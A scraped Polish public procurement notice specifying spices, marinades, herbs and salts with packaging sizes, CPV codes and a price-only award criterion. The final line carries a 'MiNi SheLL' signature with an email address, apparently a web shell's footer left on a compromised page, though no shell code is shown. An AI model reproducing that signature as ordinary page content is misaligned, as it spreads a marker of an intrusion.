Knor lub produkt rownoważny kg	1403.	Przyrawa typu - MARYNATA PREMIUM-do ryb i owoców morza; mieszanka cebuli, skórki cytrynowej, czosnku, rozmarynu, natki pietruszki, koperku i kurkumy, bez sztucznych barwników, bez glutaminianu, bez konserwantów opakowanie PET maksimum a' 1 kg typu Knor lub produkt równoważny* kg	364.	Przyprawa typu - MARYNATA PREMIUM - do wieprzowiny; mieszanka czosnku, cebuli, marchwi, bazylii, skórki pomarańczowej, natki pietruszki i szałwii. Zawiera sól morską oraz oliwę z oliwek. bez glutaminianu, bez konserwantów, bez sztucznych barwników opakowanie PET maksimum a' 1 kg typu Knor lub produkt rownoważny kg	265.	Przyprawa typu - MARYNATA PREMIUM- do wołowiny; mieszanka czosnku, gorczycy, kolendry, papryki, chili, kminku, gałki muszkatołowej i nasion selera. Zawiera sól morską oraz oliwę z oliwek. bez glutaminianu, bez konserwantów, bez sztucznych barwników opakowanie PET maksimum a' 1 kg typu Knor lub produkt równoważny........................ kg	126.	ZIOŁA PROWANSALSKIE -mieszanka rozmarynu, bazylii, tymianku, szałwi, mięty, leboidka i majeranku. Opakowanie PET maksimum a' 500g typu Kamis,Prymat lub produkt rownoważny............	kg	37.	ROZMARYN - zioła suszone opakowanie 200-300g typu Kamis,Prymat lub produkt rownoważny........................................................*/ kg	28.	CZOSNEK GRANULOWANY- opakowanie PET max 0,50 kg typu Prymat,Kamis lub produkt rownoważny........................ kg	29.	MAJERANEK SUSZONY- o wyrazistym smaku i zapachu, opakowanie max 0,25 kg typu Prymat.Kotanyi lub produkt rownowazny....................... kg	1010.	BAZYLIA - liscie bazylii wonnej, opakowanie PET maksimum a' 300g typu Kamis,Prymat lub produkt rownoważny.....................................................*/	kg	311.	TYMIANEK - o wyrazistym smaku i zapachu Opakowanie PET maksimum a' 300g typu typu Kamis,Prymat lub produkt rownoważny............	kg	212.	KURKUMA - Koloru żółtego, drobno mielona be grudek. O wyraźnym smaku i zapachu typowym dla tej przyprawy. Opakowanie PET a' 600g typu Prymat lub produkt równowazny............	kg	313.	PAPRYKA SŁODKA, MIELONA - Koloru ciemnoczerwonego, bez grudek, drobno mielona, O wyraźnym smaku i zapachu typowym dla tej przyprawy. opakowanie PET a' 0,5-1,0 kg typu Prymat,Kamis Kotanyi lub produkt rownowazny.......................... kg	1014.	Papryka słodka wędzona-koloru ciemnoczerwonego,bez grudek,o wyrazistym smaku i zapachu typowym dla tej przyprawy-opakowanie PET max 1 kg typu Prymat,Kotanyi lub produkt rownowazny.....................................	kg	515.	PIEPRZ CZARNY, MIELONY - Drobno mielony, bez grudek, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET a' 0,5-1,0 kg typu Prymat,Kamis,Knor lub produkt rownoważny kg	40016.	Przyprawa typu - Pieprz Cytrynowy - Gruboziarnisty z dodatkiem skórki cytrynowej, o charakterystycznym smaku i zapachu typowym dla tej mieszanki opakowanie max 1kg typu Prymat lub produkt rownoważny	kg	117.	LIŚĆ LAUROWY opakowanie max 25 g kg	218.	PIEPRZ CZARNY, CAŁY - Całe ziarna pieprzu czarnego, aromatyczne, o, charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET a' 500-700g typu Prymat,Kamis lub produkt rownowazny kg	119.	PIEPRZ KOLOROWY, CAŁY- Całe ziarna kolorowego pieprzu o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET a' 600-800g ............ kg	120.	PIEPRZ KOLOROWY MŁOTKOWANY - młotkowane ziarna kolorowego pieprzu, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET maksimum a' 500g, typu Kamis,Prymat lub produkt równoważny......................... kg	321.	ZIELE ANGIELSKIE - o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET 350-800g typu Kamis,Prymat lub produkt równoważny......................... kg	522.	SÓL WARZONA JODOWANA - spożywcza opakowanie a' 1 kg kg	80023.	Kwasek cytrynowy - opakowanie pet 500-1kg.........................................	kg	224.	Przyprawa typu - Delikt Przyprawa warzywna Szefa Kuchni - mieszanka przypraw i warzyw nie zawiera konserwantów i sztucznych barwiników. Mieszanka o dużej zawartości jodu. Opakowanie worek 25 kg .typu Knor lub produkt równoważny...	kg	45025.	Cynamon mielony - Drobno mielony, bez zbryleń, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET a' 300-600g kg	326.	Szafran - słupki krokusa hodowlanego o intensywnym ostrym zapachu, charakterystyczny gorzkawy i korzenny smak. opakowanie 0,001 kg szt	227.	Oregano - o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie pet 250-500g kg	228.	Kminek - o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET 250-500 g ............	kg	229.	Gorczyca - o charakterystycznym smaku i zapachu typowym dla tej przyprawy - opakowanie PET max 1 kg kg	230.	Curry - drobno mielona, pikantna przyprawa o ciemno żółtym kolorze, charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET a' 0,5-1 kg kg	531.	Przyprawa typu - MARYNATA STAROPOLSKA do mięsa i drobiu czosnek - min 25%, sól, gorczyca, kwas: kwas cytrynowy, owoc jałowca - min 4%, pieprz czarny, kolendra, cebula, chili, papryka słodka, cukier, bazylia, majeranek, ziele angielskie, cząber, rozmaryn, szałwia, liście laurowe, oregano, tymianek, mięta opakowanie 400-500 g kg	832.	Przyprawa typu - Przyprawa do flaków - sól, warzywa suszone (marchew, czosnek, cebula, pasternak, liście selera), papryka słodka, imbir, gałka muszkatołowa, gorczyca, cukier, hydrolizat białkowy sojowy, pieprz czarny, chili, liście laurowe, kurkuma. opakowanie a' 500-800g .........	kg	533.	Sól himalajska spożywcza opakowanie max 1 kg............	kg	234.	WANILIA LASKA - pakowana pojedynczo, zabezpieczona przed wyschnięciem, jędrna o intensywnym waniliowym zapachu. Nie wysuszona. opakowanie blister 1 szt .........	szt	435.	CHILI - drobno mielona, bez zbryleń, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET 500-600g kg	336.	Papryka mielona ostra - drobno mielona, jasno czerwonego koloru, bez zbryleń, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET 0,8-1,0 kg typu Kamis.Prymat lub produkt rownoważny	kg	537.	Owoc jałowca - przyprawa korzenna opakowanie PET 600g typu Kamis lub produkt równoważny.......................................* /	kg	138	Gałka muszkatałowa - proszek drobno mielony, bez zbryleń, o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie pet max 1 kg kg	139	Kmin Rzymski - Cumin w proszku o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie max 1 kg kg	240	Goździki - o charakterystycznym smaku i zapachu typowym dla tej przyprawy opakowanie PET 400-500g kg	141	Przyprawa typu - Delikat przyprawa do grilla - gruboziarnista pikantna przyprawa zawierająca sól morską, i mieszankę odpowiednio dobranych przypraw i suszonych warzyw. Bez konserwantów i stucznych barwników opakowanie Pet max 1 kg typu Knor lub produkt rownoważny	kg	542	Przyprawa typu - Delikat przyprawa do gyrosa- pikantna przyprawa zawierająca sól, cebulę, paprykę, oregano, kolendrę, czosnek, gorczycę, pieprz czarny, rozmaryn, cukier i pieprz cayenne. Bez konserwantów i stucznych barwników opakowanie Pet max 1 kg typu Knor lub produkt równoważny.....	kg	1043	Przyprawa w płynie typu - Delikat przyprawa w płynie - bez sztucznych barwników. opakowanie butelka max 1,1 kg (0,9l) typu Knor lub produkt rownoważny.....	kg	600<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15872000-1, 15833100-7, 15893200-6, 60100000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com